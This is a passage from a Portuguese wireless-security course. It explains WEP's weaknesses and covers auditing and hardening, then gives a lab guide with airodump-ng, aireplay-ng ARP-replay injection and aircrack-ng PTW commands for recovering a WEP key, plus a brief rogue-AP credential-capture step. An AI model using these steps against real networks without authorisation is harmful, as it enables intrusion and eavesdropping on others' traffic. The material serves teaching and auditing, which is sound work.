3. Computador vítima: a. Conecte-se à rede ESR-SEG6 (para o sucesso do laboratório manteremos o AP desligado, mas em um caso real a rede rogue “ganharia” do AP caso o sinal da interface de rede seja mais potente que o sinal do AP). b. Inicie o Outlook Express, que tentará automaticamente se conectar ao servidor fictício e enviará o usuário e senha. Veja na tela do metasploit esses dados coletados.

106

Segurança em Redes sem Fio

6
Redes WEP-PSK
objetivos
Examinar o protocolo WEP e conhecer suas falhas, tornando-o seguro (não é fácil); conhecer as possibilidades de ataque a redes com WEP.

conceitos

Mecanismo de segurança WEP.

Introdução
11 Problemas de WEP. 11 Ataques contra WEP. 11 Auditando redes com WEP. 11 Melhorando a segurança de redes WEP. Neste capítulo, analisaremos o protocolo Wired Equivalent Privacy (WEP), bem como suas

q

diversas vulnerabilidades, que comprometem a confidencialidade e a integridade dos dados trocados em uma rede sem fio. Para provar as vulnerabilidades, apresentaremos alguns ataques possíveis e ferramentas disponíveis. WEP definitivamente não é um protocolo de segurança recomendado, mas é necessário abordá-lo para conhecer suas vulnerabilidades e para usá-lo de forma mais segura, no caso de redes com suporte a somente esse mecanismo de segurança. Equipamentos de rede mais antigos (tanto AP quanto interface de rede) e alguns aparelhos de telefone IP com Wi-Fi de primeira geração são exemplos de dispositivos que oferecem apenas WEP como meca nismo de segurança.

Wired Equivalent Privacy (WEP)
Especificado em IEEE 802.11 (1997). Confidencialidade em redes 802.11. 11 Não é um mecanismo de segurança propriamente dito. Criptografia: 11 Algoritmo RC4. 11 Protocolo de criptografia forte, porém implementado de modo fraco no WEP. 22 RC4 também é usado nos protocolos SSL/TLS.

q
Capítulo 6 - Redes WEP-PSK

107

WEP foi criado para fornecer a redes sem fio a confidencialidade de redes cabeadas, embora seja conhecido como um mecanismo de segurança. Entretanto, devido à falta de meca nismos de segurança no início do desenvolvimento dessas redes WEP, foi adotado como uma maneira de evitar o acesso não autorizado. Especificado no padrão IEEE 802.11-1997, inicialmente determinou chaves de apenas 40 bits. A iniciativa de aumentar o tamanho das chaves para 104 bits – o que é mais comum no mercado atualmente – partiu da indústria e nunca foi parte da especificação. O problema de WEP não está em seus protocolos de criptografia, mas em sua implemen tação fraca. RC4 é um algoritmo de criptografia de fluxo (stream cipher) usado em proto colos de segurança amplamente utilizados, como Secure Socket Layer (SSL) e Transport Layer Security (TLS). WEP protege apenas os dados (payload) de quadros 802.11, ou seja, quadros de gerencia mento, de controle e o próprio cabeçalho de quadros de dados não são protegidos.

Chaves WEP
11 64 e 128 bits, na verdade, são 40 e 104 bits + IV de 24 bits. 11 Chave única por pacote. 11 Premissa de RC4: nunca use uma chave mais de uma vez. 11 Chave pré-compartilhada: 22 Cadeia de 10 ou 26 caracteres (40 ou 104 bits). 22 24 bits são o IV concatenado. 11 IV é transmitido no pacote.

q

Ao escolher um Access Point ou configurá-lo, é comum se deparar com as opções de chaves de 64 ou 128 bits. Na realidade, as chaves possuem 40 e 104 bits, respectivamente – os 24 bits restantes são o IV (Initialization Vector). A função do IV é proteger uma premissa básica de RC4: não repetir o uso de uma chave mais de uma vez. Dessa forma, cada quadro de dados 802.11 tem uma chave definida pelo admi nistrador – também conhecida como chave pré-compartilhada (de PSK, Pre-Shared Key) – e uma chave variável, o vetor de inicialização (IV). Embora seja parte do segredo, o IV não pode ser um segredo, já que o receptor precisa conhecer o IV para decifrar os dados do quadro. Por isso, ele é informado em um campo do próprio pacote, em texto claro. Uma das principais fraquezas de WEP está justamente no IV. O IEEE não definiu um padrão de seleção de IVs, o que cria uma vulnerabilidade do ponto de vista do algoritmo RC4: repetição de chaves. Uma vez que o campo do quadro 802.11 que comporta o IV tem 24 bits
Segurança em Redes sem Fio

l
WEP oferece suporte a até quatro chaves, referenciadas por um índice no cabeçalho dos pacotes. Embora não seja uma opção muito utilizada, tem como objetivo permitir que se faça rotação entre chaves.

(FF:FF:FF em hexadecimal), o valor máximo do IV é de 16777215. A repetição de valores de IV invalida a segurança de RC4, possibilitando a recuperação do texto cifrado do quadro. Adiante serão analisados ataques que exploram essa falha.

WEP no quadro 802.11
Após cabeçalho 802.11. 11 Flag WEP bit, privacy bit, secure bit.

q

108

IV 11 4 bytes antes dos dados. ICV 11 4 bytes depois dos dados. Quando o flag de WEP estiver ativado no cabeçalho de 802.11, a seção de dados do quadro é interpretada como dados precedidos por 4 bytes (IV) e seguidos de mais 4 bytes (ICV/CRC32).

q

Como mencionamos no slide anterior, o IV deve ser informado no quadro para que o receptor seja capaz de decifrá-lo em posse da chave WEP. O Integrity Check Value (ICV) é o resultado do cálculo do checksum CRC32, valor usado pelo receptor para verificar a integridade do quadro.
Figura 6.1 WEP no quadro 802.11.

802.11 Headers

IV

Data

CRC32

É bom lembrar que o CRC32 não é suficiente para detectar alterações nos quadros em trânsito.

Processo de cifragem WEP
11 Pseudo Random Generation Algorithm (PRGA). 11 Entradas: 22 Chave. 22 Chave WEP (PSK) + IV. 11 Comprimento dos dados. 22 Para que PRGA tenha o mesmo tamanho dos dados a serem cifrados. 11 Saída do algoritmo RC4: 22 Texto cifrado = XOR entre PRGA e texto em claro. 22 XOR > ou Exclusivo.

q

Para ser considerado seguro, o protocolo RC4 nunca pode usar uma chave mais de uma vez. Como isso é possível? A chave é composta por duas partes: a chave pré-compartilhada, conhecida como chave WEP ou PSK, e um Initialization Vector (IV) de 24 bits. A função do IV é alterar, pelo menos, os últimos 24 bits da chave usada em cada pacote, uma vez que seus bits iniciais são fixos e devem ser conhecidos por APs e clientes. O processo de cifragem WEP é simples: 11 Cálculo do valor ICV, um campo de 32 bits (4 bytes) adicionado ao fim do texto em claro (os dados do datagrama); 11 Algoritmo RC4 gera Pseudo Random Generation Algorithm (PRGA) com base na chave (PSK e IV concatenados) e no comprimento do texto em claro (incluindo ICV). PRGA tem o mesmo comprimento do texto em claro acrescido do ICV de 32 bits, necessário na operação XOR; 11 Conteúdo do pacote cifrado, resultado de uma operação XOR entre PRGA e texto em claro (acrescido do ICV); O processo de decifração do pacote, pelo destinatário, é um pouco mais complexo devido à verificação de integridade.
Capítulo 6 - Redes WEP-PSK

109

IV

Shared key

RC4

RC4 Keystream

Plaintext XOR Integrity Check Algorithm ICV

IV

Ciphertext
Figura 6.2 Processo de cifragem dos dados por WEP.

Ciphertext

A figura anterior ilustra o processo de cifragem dos dados por WEP. Note que a chave de cada pacote é a chave pré-compartilhada concatenada ao valor do IV – o que tem, como objetivo, satisfazer ao pré-requisito básico do algoritmo RC4 (chaves únicas). Note que o texto cifrado é concatenado com o valor de Integrity Check Value (ICV), usado na verificação da integridade do pacote na recepção. XOR 05,8 0 0 05,8 1 1 15,8 0 1 15,8 1 0 Secret Key

II
IV

WEP Seed PRNG Key Sequence

Plaintext Integrity Algorithm ICV ICV’ ICV’=ICV?

Ciphertext

Message
Segurança em Redes sem Fio

Figura 6.3 Decifrando os pacotes WEP.

11 O processo de decifração do pacote é um pouco mais complexo, pois não se trata apenas de reverter o processo de ciframento dos dados; 11 O valor do IV e o texto cifrado são separados; 11 PRGA é gerado a partir dos valores do IV recebido no pacote e da chave WEP, conhecida previamente pela estação; 11 A operação XOR entre texto cifrado e PRGA revela texto em claro + ICV; 11 O processamento do pacote depende do resultado da verificação do ICV: se o ICV calculado no receptor é o mesmo observado no pacote, então é encaminhado; caso contrário, é ignorado.

110

Problemas de WEP
A chave pode ser obtida a partir do texto cifrado. 11 Maior falha de WEP. 11 Ataque FMS. 11 Presença de valores conhecidos no texto, em claro. 22 Cabeçalho 802.2 (LLC) começa com 0xAA 0xAA. 11 Necessita de um número significativo de pacotes. 11 Ferramenta: wep_crack. Um dos maiores problemas do protocolo WEP é a possibilidade de um atacante obter a chave usada para cifrar os pacotes a partir do próprio tráfego cifrado. Em seu artigo “Key Scheduling Weaknesses in the RC4 Algorithm”, Fluhrer, Mantin e Shamir (FMS) apontam diversas fraquezas no processo de seleção do Initialization Vector (IV). Nesse artigo, os

q

valores de IV usados no protocolo WEP são considerados “criptograficamente fracos”, permi tindo que um atacante recupere partes da chave – e a chave inteira, se conseguir obter IVs fracos numa quantidade suficiente. Um elemento crítico para o sucesso desse tipo de ataque é o conhecimento prévio de uma porção do pacote cifrado por WEP. Esse fator importante desse tipo de ataque foi obtido a partir da própria estrutura típica dos pacotes: o cabeçalho 802.2 (LLC), que normalmente segue o cabeçalho 802.11, possui o valor 0xAA 0xAA.

Sem proteção contra replay
Pacote é validado ou invalidado apenas pela integridade do ICV. 11 Integrity Check Value. 11 Supõe chave WEP (PSK) correta. 11 Não garante que um pacote já foi recebido anteriormente. Atacante pode injetar tráfego capturado, mesmo sem conhecer o conteúdo.

q

A única verificação que o receptor de tráfego WEP faz ao receber um pacote é sobre o valor do Integrity Check Value (ICV). Se o ICV observado conferir com o ICV calculado, então a estação receptora assume que o transmissor possui a chave correta. A base dessa suposição é o fato de que uma chave inválida geraria PRGA inválido, fazendo com que o pacote não seja decifrado adequadamente. Esse processo não provê um mecanismo que garanta que um pacote nunca tenha sido visto naquela rede, permitindo que tráfego já recebido pela estação seja injetado. Entretanto, nesse cenário o atacante não é capaz de saber o conteúdo dos pacotes.

Verificação fraca de integridade
CRC32. 11 Mecanismo MIC fraco. 22 Message Integrity Check. 11 Usado tanto no cálculo do ICV quanto no do FCS. 22 ICV: calculado sobre o texto em claro do pacote. 22 FCS: calculado sobre o pacote todo.

q

111

Capítulo 6 - Redes WEP-PSK

11 Podem ser forjados com dados arbitrários. 22 Valores recalculados por atacante. 22 Mesmo CRC. 11 Ferramenta: HashCalc. O protocolo WEP de redes 802.11 possui outra falha envolvendo ICV: o algoritmo CRC32,

q

mecanismo Message Integrity Check (MIC) usado nas verificações de integridade ICV e FCS, é considerado criptograficamente fraco. Isso se deve à ausência de senha em uma auten ticação do tipo Hashed Message Authentication Mechanism (HMAC), que gera hash com número de bits insuficiente para tornar cada hash único. Como já vimos, o Integrity Check Value (ICV) é calculado sobre o texto em claro e concate nado ao fim deste antes de ser cifrado. Já o valor Frame Check Sequence (FCS) é obtido a partir do cálculo CRC32 de todo o pacote. A ferramenta HashCalc pode ser usada para a geração do mesmo valor de CRC32 para duas entradas diferentes: a chamada “colisão”.

w
Conheça o SlavaSoft HashCalc – Hash, CRC and HMAC Calculator: http://www.slavasoft. com

Sem mecanismo de rotação de chaves
Mesma chave desde a implantação. PSK = Pre-Shared Key. 11 Conhecimento prévio da chave. Segredo compartilhado não permanece em sigilo. 11 Vazamento da chave. 11 Usuários devem conhecer a chave. Implantações antigas: 11 Obrigam suporte para WEP. 11 Sem suporte para rotação de chaves. 11 Chave de 40 bits, chaves estáticas. A rotação de chaves WEP era feita manualmente nas primeiras implantações, em que não havia a possibilidade de rotação de chaves de implementações mais recentes. Essa difi culdade de distribuição de chaves levou e ainda leva diversas empresas a simplesmente manterem a mesma chave por anos a fio.

q

O problema dessa prática, de certa forma fundamentada na limitação da tecnologia, é que não é possível controlar a distribuição de senhas compartilhadas entre vários usuários. O vazamento da chave permite que a chave eventualmente chegue a mãos erradas, facilitando a ação de um atacante.
Segurança em Redes sem Fio

Em algumas organizações, simplesmente não é possível implantar mecanismos de segu rança mais fortes devido à necessidade de se manter a compatibilidade com equipamentos mais antigos. O resultado é a implantação, muitas vezes, de chaves estáticas com 40 bits, mais suscetíveis a ataques.

112

Vetor de inicialização muito curto
11 Alta probabilidade de ocorrência de colisão. 11 Matemática aumenta as chances de colisão, mesmo com 16.7 milhões de possibilidades. 22 Paradoxo do aniversário. 22 50% de probabilidade em 4.826 pacotes. 11 Seleção sequencial de IVs. 11 Cada pacote deve ter chave única. 11 Requisito de RC4. 11 Ferramentas para identificar IVs: Kismet, Aircrack-NG (Airodump-NG). Como vimos anteriormente, o vetor de inicialização (IV) é um elemento crítico na cifragem

q

pelo algoritmo RC4, coração de WEP. É ele que torna a chave única por pacote, já que a chave WEP é estática. A repetição de valores de IV, denominada “colisão”, é sinônimo de comprometimento da chave. Embora pareça muito, um espaço de 24 bits (16.7 milhões de combinações) para valores de IV é pouco, se levarmos em conta que a taxa de transmissão de uma rede 802.11 é da ordem de 6 mil pacotes por segundo. Existem dois fatores na seleção de IVs com influência na probabilidade de colisões: 11 Ataque do dicionário: o “paradoxo do aniversário” afirma que, em um lugar com 23 pessoas, há 50% de chances de duas pessoas compartilharem o mesmo dia de aniversário. No cenário de 16.772.216 possibilidades do espaço de IVs WEP possíveis, temos a possibilidade de colisões após apenas 4.826 pacotes; 11 Seleção sequencial de IVs: considerando o caso de dispositivos que selecionam IVs de maneira sequencial, o período do dia em que as pessoas ligam suas estações na organi zação é altamente propício para um atacante obter colisões sem a necessidade de coletar pacotes por horas ou até dias.

Fase de desafio-resposta revela o PRGA
Atacante pode monitorar a fase de autenticação: 11 AP envia desafio para a estação. 11 Estação cifra o desafio com a chave WEP que conhece e envia para o AP. 11 Desafio é o texto em claro. 11 Resposta é o texto cifrado. 22 Desafio XOR. 22 Resposta = PRGA.

q

tindo que o atacante obtenha o PRGA. Ao requisitar acesso a um AP, a estação recebe um desafio (challenge), que consiste num texto em claro. Ao receber o texto, a estação o cifra com a chave WEP que possui e envia o texto cifrado de volta para o AP. O AP também cifra o texto com sua chave, e o compara com o texto cifrado enviado pela estação. Se os textos cifrados conferem, o AP assume que a estação tem a chave WEP correta e autentica a estação.

113

Capítulo 6 - Redes WEP-PSK

Essa falha não poderia ser diferente das demais: outra falha de projeto, dessa vez permi -

A falha nesse processo está na oportunidade de o atacante ter acesso fácil a texto em claro e cifrado. Lembre-se de que: 11 XOR entre texto em claro e cifrado tem, como produto, PRGA; 11 XOR entre texto em claro e PRGA tem, como produto, texto cifrado.

Para pensar
Em posse do PRGA, um atacante é capaz de criar texto cifrado e injetar pacotes válidos na rede.

Ataques contra WEP
Implementações do ataque FMS: 11 Implementações das vulnerabilidades apontadas por FMS. 11 Ferramentas: 22 Aircrack-ng: principal ferramenta. 22 AirSnort: inativo. 22 Aircrack: inativo. 11 Aircrack-NG já implementa o novo e mais rápido ataque PTW (2007). 22 Aircrack-ptw. Existem ferramentas que implementam ataques com base nas vulnerabilidades descritas por FMS, com graus de eficiência variáveis.

q

AirSnort é a implementação mais conhecida, embora exija a captura de centenas de milhares de pacotes. Perdeu sua eficiência com o surgimento de firmwares que evitam os IVs fracos descritos por FMS, mas recuperou parte dela melhorando seu suporte a ataques estatísticos. Aircrack é uma implementeção mais recente e eficiente que AirSnort. Diferente deste último, Aircrack requer um arquivo LIBPCAP e não é capaz de quebrar a chave durante a captura. Entretanto, é muito mais eficiente que AirSnort: em média, 250 mil pacotes são suficientes para a obtenção da chave. Atualmente Aircrack está inativo. Aircrack-ng é uma versão completamente nova de Aircrack, baseada no código. Implementa, inclusive, o recente ataque PTW.

Ataque de dicionário
11 Útil apenas em AP de fabricantes que restringem a seleção de chaves a caracteres ASCII. 11 Utilidade de fingerprinting.
Segurança em Redes sem Fio

q

11 Calcula PRGA. 11 Requer apenas dois pacotes, um IV e palavras (dicionário). 11 PRGA a partir de palavras e IV observado. 11 Verifica tentativa procurando por caracteres “0xAA 0xAA”. 22 Início do cabeçalho 802.2 (SNAP) para pacotes IP unicast. Ferramentas: WepAttack e John the Ripper.

114

Esse ataque tira proveito da prática de alguns fornecedores de AP que restringem o espaço de caracteres possíveis a ASCII. Nesse cenário, o atacante precisa de apenas dois pacotes e de recursos computacionais para iniciar um ataque de dicionário off-line. Os elementos do ataque podem ser resumidos em: 11 Tentativa de decifrar o pacote a partir de palavras e do IV observado; 11 Verificação do sucesso das tentativas buscando os caracteres 0xAA 0xAA, típicos do início do cabeçalho SNAP (802.2), que indicam que o pacote foi decifrado; 11 Por que coletar dois pacotes? Verificação dupla, no caso de descoberta da chave.

Algoritmo de geração de chaves Neesus Datacom
11 Objetivo de gerar chaves WEP a partir de um texto qualquer. 11 Chaves hexadecimais a partir de qualquer palavra. 11 Problema: 11 geração de chaves fracas. 11 Presente nos APs de diversos fornecedores. 11 Ferramentas: nwepgen, wep_crack, 11 utilizadas em chaves de 40 bits.

q

Ao criar chaves WEP, normalmente se utilizam palavras de dicionário, o que facilita ataques. Outro fator que limita a escolha é a exigência de comprimento: 10 caracteres para WEP 40 bits, e 26 para 104 bits.

Não é raro o administrador de rede escolher uma chave baseada em uma palavra com caracteres repetidos, de forma que o requisito de comprimento seja atendido.

Visando a facilitação do processo de criação de chaves, a empresa Neesus Datacom desen volveu um algoritmo que gera chaves WEP a partir de qualquer cadeia de até 16 caracteres. Embora não seja um padrão oficial, muitos fornecedores implementam esse mecanismo para a geração de chaves.

115

Capítulo 6 - Redes WEP-PSK

Infelizmente, o algoritmo Neesus Datacom não gera chaves WEP exclusivas, falhando em seu objetivo e possibilitando ataques. A primeira operação do algoritmo já começa a tornar as chaves menos únicas, uma vez que quebra a senha digitada em blocos de 4 bytes e realiza uma operação de XOR entre as colunas. Outro fator da senha que torna as chaves menos únicas é o fato de caracteres ASCII terem valores em hexadecimal que variam de 0x00 a 0x7F, sendo que o bit mais significativo nunca é definido (7F = 1111111). Ao final, uma chave de 40 bits passa a ser tão única quanto uma chave de 21 bits – um espaço de possibilidades que permite que um atacante tente todas as 221 combinações (2.097.152 chaves) em um ataque de força bruta.

Figura 6.4 Algoritmo de geração de chaves Neesus Datacom.

Auditando redes com WEP
Identificando redes com WEP. 11 Privacy bit normalmente definido. 22 Wireshark: display filter “wlan.fc.protected == 1”. 11 Pacotes de desafio/resposta. 11 Análise dos quadros beacon. 22 Ausência de TKIP (WPA1) e AES (WPA2).
Segurança em Redes sem Fio

q

22 Ausência de tráfego 802.1x. 33 Quadros EAPOL (EAP Over LAN). 33 Wireshark: display filter “eapol”. Existem diversas maneiras de identificar tráfego WEP. Algumas delas: 11 Procurar por pacotes que estejam com o “privacy bit” ativado. Isso pode ser feito no Wireshark através do display filter “wlan.fc.protected == 1”. Lembre-se de que conexões MAN Lucent não apresentam esse bit;

116

11 Procurar por tráfego de desafio/resposta, típico da fase de autenticação WEP; 11 Selecionar quadros beacon e examiná-los, em busca de indicadores da presença de WEP ou ausência de TKIP (WPA1) e AES (WPA2). Isso pode ser feito no Wireshark com auxílio do display filter “wlan.fc.type == 0”; 11 Procurar pela presença de tráfego EAPOL (EAP Over LAN), que pode indicar a presença de 802.1x e, por consequência, a ausência de autenticação WEP.

Etapas da auditoria
11 A auditoria depende da quantidade de tráfego coletada. 11 Sequência de técnicas sugerida: 22 Recuperação de chaves de 40 bits Neesus Datacom. 11 Ataque de dicionário: 22 Usar WepAttack associado ao John the Ripper. 22 Personalizar dicionário com dados da organização: nomes de pessoas, nome da empresa. 11 Verificar o indicador de IVs fracos de Kismet. 22 Arquivo . network. 22 Do ponto de vista de AirSnort, não de Aircrack-ng.

q

Avaliar uma rede com WEP depende do tempo que o auditor tem à sua disposição – quanto mais tempo disponível, melhor a análise. É recomendável que se comece a auditoria por wep_crack, verificando se a rede utiliza o algoritmo Neesus Datacom. Na sequência, uma associação entre as ferramentas WepAttack e John the Ripper em um ataque de dicionário personalizado pode revelar chaves baseadas no nome de funcionários ou da empresa. É possível identificar se há interfaces de rede que selecionam IVs fracos (artigo FMS). Isso pode ser feito com a análise da saída do utilitário Kismet, mais especificamente o campo “Weak” do arquivo .nework.

Melhorando a segurança de redes WEP
Quando WEP não é apropriado: 11 Em redes que não tolerem captura e deciframento de tráfego e acesso não autorizado. 11 Para análise de riscos. Quando WEP é apropriado:
PDA Pequeno computador que cumpre as funções de agenda e sistema informático de escritório, com possibilidade de interconexão com um computador e uma rede Wi-Fi para acesso a e-mail e internet.

q

11 Quando o hardware não é compatível com WPA/WPA2. 11 Para uso doméstico sem pretensão de ser seguro. 11 Associado ao uso de VPN. 22 O mesmo vale para WPA e WPA2, Personal ou Enterprise. Embora tenhamos, de certa forma, provado neste capítulo que o WEP já foi condenado, essa tecnologia ainda pode ser aplicada em alguns cenários. O primeiro deles é, na realidade, uma limitação: muitos Access Points mais antigos, PDAs e telefones IP não oferecem segurança superior a WEP. Isso faz com que o administrador da rede tenha de usar o que estiver ao seu alcance para contornar a insegurança de WEP. 117
Capítulo 6 - Redes WEP-PSK

Outro cenário em que WEP pode ser apropriado é para uso doméstico, desde que o usuário esteja ciente de que um atacante determinado não será contido. Redes desprovidas de segurança são alvos mais fáceis; de qualquer forma, mesmo redes com WEP dependem de certas condições (captura de grande quantidade de tráfego, horário ideal de captura etc.) para permitirem a interceptação dos dados ou o acesso não autorizado da rede.

Migrar para um método de segurança mais forte
WPA (TKIP) ou WPA2 (CCMP) com cifra AES. 11 Dynamic WEP: 22 Reduzir intervalo de emissão de chaves. 22 30 segundos, se possível. 33 Dificulta ataque FMS. 11 Colisões de IV: 22 Aumentam, se o intervalo de emissão é pequeno. 22 Seleção de IV sequencial associada com a nova chave.

q

É possível tornar WEP mais seguro por segurança em profundidade (In-Depth Security), ou seja, pela adoção de mecanismos de segurança em várias camadas, embora esse não seja o foco deste curso. Comparado com mecanismos de segurança mais recentes, WEP oferece menos segurança e deve ser substituído por mecanismos mais eficientes, tais como TKIP (WPA1) ou AES (WPA2). Caso essa substituição por mecanismos mais modernos e seguros não seja possível, por motivos financeiros ou por manutenção de compatibilidade, é viável implantar Dynamic WEP e reduzir o intervalo de emissão de chaves para 30 ou 60 segundos. Essa medida dificultará ataques FMS, uma vez que o atacante não conseguirá coletar IVs suficientes. Colisões de IV não podem ser evitadas, já que tanto estações como APs podem selecionar os valores de IV de maneira sequencial. Por outro lado, reduzir o intervalo de emissão de chaves aumenta a utilização de CPU e gera mais colisões de IV, uma vez que o contador é zerado para 00:00:00 com mais frequência.

118

Segurança em Redes sem Fio

Roteiro de Atividades 6
Este capítulo teve o propósito de demonstrar a vulnerabilidade do protocolo WEP e não de ensinar técnicas de cracking, o que está fora do seu escopo. Outro aspecto importante da prática está no fato de que a parte inicial do processo de recuperação da chave, captura de pacotes WEP, filtragem e seleção correta dos pacotes podem demandar muito tempo, devido a variáveis como distância do AP, interferência, instabilidade do driver rt73 da interface Linksys WUSB54GC. Para garantir uma experiência positiva, fornecemos um arquivo de captura ideal. As ferramentas utilizadas são airmon-ng, airodump-ng, aireplay-ng e aircrack-ng, partes do pacote Aircrack-ng.

Atividade 6.1 – Capturando pacotes cifrados com WEP com ferramentas Aircrack-ng
Antes de usar a ferramenta Aircrack-ng, precisamos capturar tráfego ideal, com vetores de inicialização em quantidade suficiente para a recuperação da chave. Hoje, com apenas 40 mil pacotes, a probabilidade de sucesso na recuperação de uma chave WEP 104 bits é de cerca de 50%. A probabilidade de sucesso aumenta para 80% com 60 mil pacotes e para 95% com 85 mil pacotes. Capturar esse volume de tráfego naturalmente pode levar muito tempo, dependendo do volume de tráfego da rede. Para resolver esse problema, aprenderemos a acelerar a captura do tráfego ideal pela injeção de tráfego. Antes de qualquer ação, devemos conhecer a rede cuja chave desejamos recuperar. É interessante que capturemos apenas tráfego relevante, ou seja, que pertença ao AP em questão. Vamos usar Airodump-ng para conhecer os seguintes dados: 11 Endereço MAC de um cliente associado ao AP: Escolha um cliente com mais tráfego (painel inferior); 11 Endereço MAC do AP (BSSID): informe-se com o instrutor sobre o BSSID correto; 11 Canal. Para visualizar as redes, execute os seguintes comandos:

# airmon-ng start wlan0 # airodump-ng mon0
Selecione um BSSID, MAC (cliente) e um canal. Anote-os.
Capítulo 6 - Roteiro de Atividades

BSSID: MAC: Canal: Já colocamos a interface wlan0 em modo Monitor com a execução do comando airmon-ng. Agora vamos iniciar a captura do tráfego específico. Comecemos abrindo três terminais diferentes. Para efeito de organização, vamos executar todos os comandos a partir do seguinte diretório:

119

/root/Desktop/SEG6/saidas/
Para isso, vamos executar o seguinte comando em um terminal:

# cd /root/Desktop/SEG6//saidas/wep
Execute o seguinte comando:

# airodump-ng --channel <Canal> --bssid <BSSID> wlan0 -w airodumpsaida
Substitua o valor do parâmetro “--bssid” pelo BSSID que anotamos. Escolha o canal correto e utilize-o como parâmetro “--channel”. No diretório “/root/Desktop/SEG6/saidas/wep”, serão criados arquivos no formato airodump-saida-xx.cap, onde xx é um número sequencial com início em 01. Se por algum motivo interrompermos esse comando (Control + C), e se não apagarmos os arquivos com sufixo 01, serão criados novos arquivos com o número sequencial seguinte (exemplo: airodump-saida-02.cap). Mantenha essa janela de terminal aberta e abra outra. Nessa segunda janela de terminal executaremos a ferramenta aireplay-ng, com a finalidade de aumentar a quantidade de pacotes que trafegam na rede e capturar mais IVs em um menor espaço de tempo. Para melhores resultados, tente se posicionar entre o AP e o cliente escolhidos.

# aireplay-ng -3 rausb0 -b <BSSID> -h <MAC Cliente>
Com esse comando, vamos capturar o tráfego ARP entre um cliente (especificado pelo parâ metro “h”) e o AP (especificado pelo parâmetro “b”) e o injetar novamente, criando tráfego ideal mais rapidamente. Devido ao comportamento do tráfego ARP, é necessário que pelo menos um cliente esteja associado ao AP para que o funcionamento da ferramenta seja bem-sucedido. O método PTK usa especificamente tráfego ARP, por isso esse tipo de injeção foi escolhido. Consulte a documentação do Aireplay-ng para conhecer os outros tipos de injeção. Essa é a saída do comando aireplay-ng. Note que à esquerda (got...) é exibido o número de pacotes ARP capturados. À direita é exibido o número de pacotes injetados.

The interface MAC (00:1E:E5:27:C2:8A) doesn’t match the specified MAC (-h). ifconfig rausb0 hw ether 00:15:AF:B6:46:45 21:50:29 Waiting for beacon frame (BSSID: 00:0F:66:81:7C:88) on channel 6 Saving ARP requests in replay_arp-0908-215029.cap
Segurança em Redes sem Fio

You should also start airodump-ng to capture replies. Read 1508 packets (got 136 ARP requests and 0 ACKs), sent 149 packets...(501 pps Read 1555 packets (got 176 ARP requests and 0 ACKs), sent 199 packets...(500 pps Read 1607 packets (got 222 ARP requests and 0 ACKs), sent 248

120

packets...(498 pps Read 1655 packets (got 260 ARP requests and 0 ACKs), sent 298 packets...(498 pps Read 1704 packets (got 302 ARP requests and 0 ACKs), sent 349 packets...(500 pps
Aguarde até que o número de pacotes injetados atinja a marca de 40 mil pacotes. Observe a saída “sent xxx packets”. Quando o número 40 mil for alcançado, avance para a atividade seguinte. É bem provável que a quantidade de pacotes necessários não tenha sido obtida com a injeção de apenas 40 mil pacotes. Por isso, vamos manter a janela com o Aireplay-ng aberta e manter a execução de Aircrack-ng, que realiza as colisões em intervalos de 5 mil pacotes.

Atividade 6.2 – Recuperando uma chave WEP utilizando o Aircrack-ng
Nesta atividade, vamos utilizar a ferramenta Aircrack-ng no Linux para recuperar a chave WEP do tráfego pré-capturado. Para utilizar o Aircrack-ng, é necessária uma captura com no mínimo 250 mil pacotes (IVs) para chaves WEP de 40 bits e pelo menos 500 mil pacotes (IVs) para chaves de 104 bits. O ataque PTW, introduzido em 2007, diminuiu significativamente o tempo necessário para um ataque bem-sucedido. Usando técnicas ativas, ou seja, enviando tráfego deauth ou ARP re-injection (capturar tráfego ARP e repeti-lo), esse novo ataque apenas enfatiza que a descoberta da chave WEP é uma questão de hardware, software, drivers e tempo. Verifique o arquivo pré-capturado do instrutor, /root/Desktop/SEG6/ wep-aireplay-ng.cap com o Wireshark e veja quantos pacotes foram necessários para a recuperação da chave WEP nesse caso específico. Abra uma nova janela de terminal, a terceira janela. Mantenha as duas outras janelas abertas, com Airodump-ng e Aireplay-ng. Execute o comando aircrack-ng. Verifique os parâmetros disponíveis executando a própria ferramenta aircrack-ng :

# aircrack-ng Aircrack-ng 1.0 rc1 r1085 - (C) 2006,2007,2008 Thomas d’Otreppe Original work: Christophe Devine http://www.aircrack-ng.org usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : force attack mode (1/WEP, 2/WPA-PSK) -e <essid> : target selection: network identifier -b <bssid> : target selection: access point’s MAC -q : enable quiet mode (no status output)
Capítulo 6 - Roteiro de Atividades

-C <macs> : merge the given APs to a virtual one

121

Static WEP cracking options: -c -t -h : search alpha-numeric characters only : search binary coded decimal chr only : search the numeric key for Fritz!BOX

-d <mask> : use masking of the key (A1:XX:CF:YY) -m <maddr> : MAC address to filter usable packets -n <nbits> : WEP key length : 64/128/152/256/512 -i <index> : WEP key index (1 to 4), default: any -f <fudge> : bruteforce fudge factor, default: 2 -k <korek> : disable one attack method (1 to 17) -x or -x0 : disable bruteforce for last keybytes -x1 -x2 -y -K -s : last keybyte bruteforcing (default) : enable last 2 keybytes bruteforcing : experimental single bruteforce mode : use only old KoreK attacks (pre-PTW) : show the key in ASCII while cracking : specify maximum number of IVs to use

-M <num> -D

: WEP decloak, skips broken keystreams : PTW debug: 1: disable Klein, 2: PTW

-P <num> -1

: run only 1 try to crack key with PTW

WEP and WPA-PSK cracking options: -w <words> : give filename(s) of the dictionaries -r <DB> : path to airolib-ng database (Cannot be used with -w) --help : Displays this usage screen

Exemplo de comando usando o novo ataque PTW:5

# aircrack-ng -P 2 /root/Desktop/SEG6/saidas/wep/airodump-saida-01.
Segurança em Redes sem Fio

cap
A captura e injeção de pacotes estão sujeitas a diversas variáveis. Por isso, é possível que você não consiga capturar o tráfego mínimo necessário. Se isso acontecer, use o arquivo pré-capturado para observar a saída bem-sucedida do comando dentro do tempo destinado ao laboratório.

# aircrack-ng -P 2 /root/Desktop/SEG6/wep-aireplay-ng.cap

122

Verifique a quantidade de vetores de inicialização (IVs) necessários e o tamanho da chave obtida, e estime o tempo gasto na recuperação da chave depois que o tráfego ideal foi capturado. Agora vamos repetir o comando anterior com outros métodos de ataque para constatar o avanço que o ataque PTW trouxe.

Atividade 6.3 – Decifrando tráfego WEP
